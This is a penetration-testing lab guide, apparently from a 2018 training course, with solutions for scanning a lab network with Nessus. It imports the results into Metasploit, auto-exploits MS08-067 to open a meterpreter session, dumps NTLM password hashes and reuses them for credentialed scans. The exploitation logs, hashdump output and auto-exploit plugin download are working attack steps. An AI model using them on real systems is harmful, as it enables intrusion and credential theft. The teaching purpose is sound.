Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

© 2018 Caendra, Inc. - Hera For PTP - Nessus

Download as pdf or txt
Download as pdf or txt
You are on page 1of 17
At a glance
Powered by AI
The document provides instructions for conducting a vulnerability assessment using Nessus and Metasploit. It describes tasks for configuring Nessus, importing scans into Metasploit, exploiting vulnerabilities, and using credential data to perform more thorough scans.

The document aims to educate readers on how to use tools like Nessus and Metasploit to conduct a vulnerability assessment of an internal network. It provides tasks and instructions to assess the FooCompany network using these tools.

The steps described are: running an initial Nessus scan, importing the results into Metasploit to exploit vulnerabilities, using Metasploit to dump password hashes, configuring a new Nessus scan with the harvested credentials, and comparing the results of the credentialed scan.

© 2018 Caendra, Inc.

| Hera for PTP | Nessus 1


You are a member of a penetration testing team and your task is to conduct a Vulnerability
assessment against the internal network of FooCompany. This assessment is performed
onsite and you are directly connected to the company’s LAN.

Target organization: FooCompany.

Scope: This is what client organization defined as scope of tests:

• Organization network: 192.168.78.0/24


• DMZ: 10.100.0.0/24

The following image summarizes the Lab environment:

© 2018 Caendra, Inc. | Hera for PTP | Nessus 2


• Perform a vulnerability assessment

• Configuring Nessus policies, credentials and plugins


• Using Nessus through Metasploit console

This lab will present you with different tasks in order to fulfill these objectives.

The tasks are meant for educational purposes and to show you the usage of different tools
and different methods to achieve the same goal.

Important: They are not meant to be used as a methodology.

Armed with the skills acquired during these tasks, you can achieve the Lab goal.

Repeat this lab as often as you like, but if this is the first time you do this lab, we advise you
to follow these tasks.

Solutions are provided at the end of this document.

• Nessus
• Metasploit

© 2018 Caendra, Inc. | Hera for PTP | Nessus 3


Start Nessus and run a new scan on the target network 192.168.78.0/24, using the
existing policy Internal Network Scan.

Once the scan is finished, complete the following table with the discovered hosts and the
number of high/medium vulnerability found for each.

Host IP High Vulnerabilities Medium Vulnerabilities

Note: you can also perform host discovery using tools like Nmap and then feed Nessus with
the right IP addresses.

Metasploit offers the ability to use Nessus directly from the msfconsole. This is a very
useful feature that allows us to load existing Nessus scans and then exploit existing
vulnerabilities.

Once you have loaded the previous scan (Task 1) into Metasploit, find exploitable
vulnerabilities, or use plugins such as auto_exploit or db_autopwn, in order to obtain
one or more meterpreter shells.

NOTE: this plugin has been removed from recent versions of Metasploit, you'll need to
install manually.

This hopefully allows us to obtain access to target machines and then retrieve useful
information, such as credentials, to use for further Nessus scans in our penetration testing
cyclical process.

© 2018 Caendra, Inc. | Hera for PTP | Nessus 4


You should now have a meterpreter session. Use it to dump password hashes from the
exploited machine (hashdump command from meterpreter shell). Once you have the
hashes, create a new Nessus scan in order to use NTLM hashes as Windows credentials.

Moreover, set the following SSH credentials:

• Username: netadmin
• Password: netpwd

Once the scan is finished, you can notice that the report differs from the previous obtained
(Task 1). This happens because, Nessus is now able to scan the remote host using
credentials thus running checks with local privileges.

Please fill the next table with the results of the new scan:

Host IP High Vulnerabilities Medium Vulnerabilities

The organization asks you to perform a Web Application scan to the webserver, placed
inside the DMZ (10.100.0.0/24). The server IP address is 10.100.0.80.

Create a new Nessus policy and perform a Web App scan. Don’t use existing policy but
think about which plugins are useless and which are not.

© 2018 Caendra, Inc. | Hera for PTP | Nessus 5


© 2018 Caendra, Inc. | Hera for PTP | Nessus 6
The first thing to do is to start Nessus Service:

# service nessusd start

or from the Applications menu: Vulnerability Analysis > Nessus start.

Once the service is running, we can access the Nessus GUI, at the address:
https://127.0.0.1:8834

We can now start our scan against the network by starting a new Scan based on Basic
Network Scan policy.

NOTE: since we are within the target network, if we set the whole subnet to
192.168.78.0/24, our machine will be scanned too. To avoid this, we can use tools
like Nmap to perform a host discovery, and then manually provide Nessus with IP
address to scan: nmap -sn -oG - 192.168.78.* | awk '/Up$/ {print $2}'

© 2018 Caendra, Inc. | Hera for PTP | Nessus 7


After selecting FooCompany from the Scans menu, we can have an overview of the results:

© 2018 Caendra, Inc. | Hera for PTP | Nessus 8


Note: depending on the plugins update level, scan results might differ.

As you can see from the results, different vulnerabilities have been found on the target
machines. You can navigate them by selecting the host and then the specific vulnerability.

Instead of using the web browser GUI, we can also use Nessus from Metasploit. This will
help us in case we want to try assess and exploit any vulnerability. Since we have already
performed the scan, we will just load the Nessus results in msf and automatically exploit
vulnerabilities.

Let’s open a new msfconsole and then let’s connect to Nessus:

msf > load nessus


/usr/share/metasploit-framework/plugins/nessus.rb:47: warning: key
"nessus_scanner_list" is duplicated and overwritten on line 78
[*] Nessus Bridge for Metasploit
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: Nessus
msf > nessus_connect user:password@localhost
[*] Connecting to https://localhost:8834/ as user
[*] User user authenticated successfully.
msf >

Now that we are connected with Nessus, we can run basic commands such as run a new
scan, navigate reports and so on.

msf > nessus_


nessus_admin nessus_report_download nessus_scan_resume
nessus_connect nessus_report_host_details nessus_scan_resume_all
nessus_db_import nessus_report_hosts nessus_scan_stop
nessus_db_scan nessus_report_vulns nessus_scan_stop_all
nessus_family_list nessus_save nessus_scanner_list
nessus_folder_list nessus_scan_details nessus_server_properties
nessus_help nessus_scan_export nessus_server_status
nessus_index nessus_scan_export_status nessus_template_list
nessus_logout nessus_scan_launch nessus_user_add
nessus_plugin_details nessus_scan_list nessus_user_del
nessus_plugin_list nessus_scan_new nessus_user_list
nessus_policy_del nessus_scan_pause nessus_user_passwd
nessus_policy_list nessus_scan_pause_all
msf > nessus_

Since we already have a report, we can load it so that Metasploit can load the list of
vulnerabilities. First of all, let's list the existing scans:

© 2018 Caendra, Inc. | Hera for PTP | Nessus 9


msf > nessus_scan_list
Scan ID Name Owner Started Status Folder
------- ---- ----- ------- ------ ------
8 FooCompany user completed 3

Once we know the Scan identifier, then can use the nessus_report_* commands as
follow:

msf > nessus_report_hosts 8

or

msf > nessus_report_vulns 8

and we can import the results in Metasploit:

msf > nessus_db_import 8


[*] Exporting scan ID 8 is Nessus format...
[+] The export file ID for scan ID 8 is 799298863
[*] Checking export status...
[*] The status of scan ID 8 export is ready
[*] Importing scan results to the database...
[*] Importing data of 192.168.78.10
[*] Importing data of 192.168.78.15
[*] Importing data of 192.168.78.18
[*] Importing data of 192.168.78.20
[*] Importing data of 192.168.78.23
[*] Importing data of 192.168.78.1
[+] Done
msf >

now vulnerabilities and targets have been imported into the database. To explore the list,
we need to invoke vulns:

msf > vulns


[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=Nessus Scan
Information refs=NSS-19506
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSL Session Resume
Supported refs=NSS-51891
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSL Version 2 and 3
Protocol Detection refs=NSS-20007
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSLv3 Padding Oracle
On Downgraded Legacy Encryption Vulnerability (POODLE) refs=CVE-2014-3566,BID-
70574,OSVDB-113251,CERT-577193,NSS-78479
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSL Cipher Block
Chaining Cipher Suites Supported refs=NSS-70544
[*] Time: 2016-05-10 11:02:48 UTC Vuln: host=192.168.78.1 name=SSL Perfect Forward
Secrecy Cipher Suites Supported refs=NSS-57041

© 2018 Caendra, Inc. | Hera for PTP | Nessus 10


What we can do now, is to automatically exploit the target hosts using vulnerabilities
loaded into the DB. To do this, we will use the plugin pentest by darkoperator. You can
download it here:

https://github.com/darkoperator/Metasploit-Plugins/blob/master/pentest.rb

and install as follow:

root@kali:~/.msf4/plugins# wget
https://raw.githubusercontent.com/darkoperator/Metasploit-Plugins/master/pentest.rb

msf > load pentest

___ _ _ ___ _ _
| _ \___ _ _| |_ ___ __| |_ | _ \ |_ _ __ _(_)_ _
| _/ -_) ' \ _/ -_|_-< _| | _/ | || / _` | | ' \
|_| \___|_||_\__\___/__/\__| |_| |_|\_,_\__, |_|_||_|
|___/

Version 1.3
Pentest plugin loaded.
by Carlos Perez (carlos_perez[at]darkoperator.com)
[*] Successfully loaded plugin: pentest
msf >

Once the plugin is loaded, we can run the exploitation process:

msf > vuln_exploit


[*] Generating List for Matching...
[*] Matching Exploits (This will take a while depending on number of hosts)...
[+] Matched Exploits:
[+] 192.168.78.10 exploit/windows/smb/ms08_067_netapi 445 500
[*] Running Exploits:
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.78.10

[*] Started reverse TCP handler on 192.168.78.100:16307


msf > [*] 192.168.78.10:445 - Automatically detecting the target...
[*] 192.168.78.10:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.78.10:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.78.10:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.78.10
[*] Meterpreter session 1 opened (192.168.78.100:16307 -> 192.168.78.10:1032) at
2016-05-10 13:11:07 +0200
[*] AutoAddRoute: Routing new subnet 192.168.78.0/255.255.255.0 through session 1

© 2018 Caendra, Inc. | Hera for PTP | Nessus 11


As you can see, the machine 192.168.78.10 has been successfully exploited and we have
obtained a Meterpreter session. Now we should be able to dump password hashes and then
use them to run a new Nessus scans with credentials:

msf > sessions

Active sessions
===============

Id Type Information Connection


-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ ELS-WINXP 192.168.78.100:16307 ->
192.168.78.10:1032 (192.168.78.10)

msf > sessions -i 1


[*] Starting interaction with 1...

meterpreter > sysinfo


Computer : ELS-WINXP
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
meterpreter > hashdump

Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::
:
eLSAdmin:1003:67fb9805a02c8249aad3b435b51404ee:b0c6522c478a0886fb92544d16c75679:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a88f7de3e682d17fea34bd03086620b5:2b07e52daf608f50d4cd9506c5b0220d:
::
netadmin:1004:6d4c8d28110c649d1f6252914a7633d7:1f1c7bfdba645b14c37dde4465b59542:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9f79c84005db73e0122f424022f8db
c0:::

meterpreter >

© 2018 Caendra, Inc. | Hera for PTP | Nessus 12


The next step is to create and configure a new Nessus policy in order to scan targets using
the credentials obtained with the previous hashdump command. Remember that the string
obtained with hashdump is composed as follow:

• The first field is the username


o i.e.: Administrator
• The second field is the Security IDentifier
o i.e.: 500
• The third field is the LM hash
o i.e.: e52cac67419a9a224a3b108f3fa6cb6d
• The forth field is the NTLM hash
o i.e.: 8846f7eaee8fb117ad06bdd830b7586c

We can now create a new scan policy and add the exported Windows Credentials:

Furthermore, we can also the known SSH credentials:

© 2018 Caendra, Inc. | Hera for PTP | Nessus 13


Let's run the scan:

© 2018 Caendra, Inc. | Hera for PTP | Nessus 14


As you can see, configuring Nessus with the right credentials, allows us to scan target hosts
locally, and find many more vulnerabilities. In this case the credentials worked for three
hosts.

From the Policies menu, let's create a new policy. Since we want to scan a web
application, from the Scanner Template we can select Web Application Tests.

Then, let's perform a simple Nmap port scan, in order to restrict the ports to scan:

root@kali:~# nmap -sS 10.100.0.80

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-10 15:20 CEST


Nmap scan report for 10.100.0.80
Host is up (0.14s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
1026/tcp open LSA-or-nterm
3306/tcp open mysql

© 2018 Caendra, Inc. | Hera for PTP | Nessus 15


Now, in Settings > Discovery let's set the Scan Type to Custom. Then, let's disable
the Host Discovery feature and, from the Port Scanning menu, let's set the opened
ports we just discovered.

Note: 135, 139 and 1026 were ignored because not related to the web application, but
you could add them as well.

From the Assessment section, as Scan Type let's select: Scan for all web
vulnerabilities and Save.

Now that we have completed our policy set-up, we can run the scan against the webserver.
Here's the results:

© 2018 Caendra, Inc. | Hera for PTP | Nessus 16


Now that you are more confident with Nessus, you can try to create custom Nessus policies
in order to check which plugins and which configurations fit better for different situations.
You can also practice scanning and exploiting targets directly from Metasploit.

© 2018 Caendra, Inc. | Hera for PTP | Nessus 17

You might also like